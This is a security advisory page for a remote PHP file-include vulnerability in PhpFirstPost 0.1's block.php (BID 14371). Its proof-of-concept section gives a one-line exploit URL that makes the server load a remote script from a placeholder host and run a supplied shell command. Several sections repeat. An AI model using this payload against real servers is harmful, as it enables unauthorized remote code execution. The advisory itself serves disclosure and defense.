PHPFirstpost Block.PHP Remote File Include Vulnerability
BID:14371
Info
PHPFirstpost Block.PHP Remote File Include Vulnerability
| Bugtraq ID: | 14371 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-2412 CVE-2007-2665 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 25 2005 12:00AM |
| Updated: | May 12 2015 07:49PM |
| Credit: | ][GB][ and Zetha are credited for the discovery of this vulnerability. |
| Vulnerable: |
PhpFirstPost PhpFirstPost 0.1 |
| Not Vulnerable: | |
Discussion
PHPFirstpost Block.PHP Remote File Include Vulnerability
Phpfirstpost is prone to a remote PHP file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Phpfirstpost is prone to a remote PHP file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exploit / POC
PHPFirstpost Block.PHP Remote File Include Vulnerability
An exploit example has been provided:
http://www.example.com/block.php?Include=http://www.example.com/cmd.gif?&cmd=|command|
An exploit example has been provided:
http://www.example.com/block.php?Include=http://www.example.com/cmd.gif?&cmd=|command|
Solution / Fix
PHPFirstpost Block.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHPFirstpost Block.PHP Remote File Include Vulnerability
References:
References: